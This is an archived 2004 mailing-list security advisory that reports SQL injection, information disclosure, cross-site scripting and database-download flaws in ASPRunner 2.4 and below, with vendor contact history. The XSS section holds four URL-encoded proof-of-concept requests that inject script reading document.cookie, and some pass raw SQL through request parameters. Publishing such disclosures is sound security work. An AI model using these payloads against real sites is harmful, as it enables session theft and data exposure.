lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200407260857.i6Q8vtu01228@netsys.com>
From: ferruh at mavituna.com (Ferruh Mavituna)
Subject: ASPRunner Multiple Vulnerabilities

------------------------------------------------------
ASPRunner Multiple Vulnerabilities
------------------------------------------------------

Online URL : http://ferruh.mavituna.com/article/?574

1) SQL Injection;
Severity : Moderatly Critical

2) Information Disclosure;
Severity : Low Critical

3) XSS (Cross Site Scripting);
Severity : Low Critical

4) Database Download;
Severity : Moderatly Critical


------------------------------------------------------
ABOUT ASPRunner;
------------------------------------------------------
Developer Description;
ASPRunner creates a set of ASP pages to access and modify Oracle, SQL
Server, MS Access , DB2, MySQL, or FileMaker databases, or any other ODBC
datasource. Using generated ASP pages, users can search, sort, edit, delete
and add data into a database. ASPRunner is easy to learn, you can get
started in just 10 minutes!

URL & Demo Download ;
http://www.xlinesoft.com/asprunner/


------------------------------------------------------
VULNERABLE;
------------------------------------------------------
ASPRunner version 2.4 and below


------------------------------------------------------
NOT VULNERABLE;
------------------------------------------------------
-

------------------------------------------------------
1) SQL Injection;
------------------------------------------------------
Every Page is vulnerable to SQL Injection atacks. (Login pages are not
vulnerable). 
There is no POC because of SQL Injection attacks depends on database type
and structure.



------------------------------------------------------
2) INFORMATION DISCLOSURE;
------------------------------------------------------
An attacker can gain information from hidden fields and file names.

	- File names disclosure database generated table name.
	- Several hidden field shows complete SQL Queries
	- Also these hidden fields can be modified.
	- Errors are generating detailed page which gives lots of
information to the client.

------------------------------------------------------
3) XSS (Cross Site Scripting);
------------------------------------------------------
There are no control for XSS attacks, some samples from several pages;
	
	- [TABLE]_search.asp (post)
	
http://[VICTIM]/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word
_id&NeedQuoteswordid=False%2C+False&Typewordid=3%2C+3&SearchOption=Contains&
SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&S
earchFor=&FieldName=en&NeedQuotesen=True&Typeen=202&SearchOption=Contains&Se
archFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldNam
e=desc&NeedQuotesdesc=True&Typedesc=203&SearchOption=Contains&SearchFor=


	- [TABLE]_edit.asp (post)
	
http://[VICTIM]/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPa
geNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ese
lect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc
%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&Ne
edQuotes=&NeedQuotes=&action=view


	- [TABLE]_list.asp (post)
	
http://[VICTIM]/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPa
ge=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C
+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+
like+%27%25&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField
&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%2
9%3C%2Fscript%3E&PageSizeSelect=20&NeedQuoteswordid=False&Typewordid=3&NeedQ
uoteswordid=False&Typewordid=3&NeedQuotestr=True&Typetr=202&NeedQuotesen=Tru
e&Typeen=202&NeedQuotesdesc=True&Typedesc=203

	- export.asp (post)
	
http://[VICTIM]/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%
3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben
%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1&
pagesize=20



------------------------------------------------------
4) Database Download;
------------------------------------------------------
	Database can be downloaded over web. This is not a critical issue
because there is no way to determine filename. But it's easy to guess it by
gathering information about table and field names.

	MS Access or other database file (if it's not MSSQL, similar or ODBC
Connection) can be found on http://[VICTIM]/db/[DB-FILE-NAME]



-----------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 04.07.2004
Vendor Informed : 05.07.2004 / 12.07.2004
Published : 26.07.2004


------------------------------------------------------
Vendor Status;
------------------------------------------------------
2 emails, No Reply, No Fix



Ferruh Mavituna
http://ferruh.mavituna.com
PGP Key: http://ferruh.mavituna.com/pgpkey.asc


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ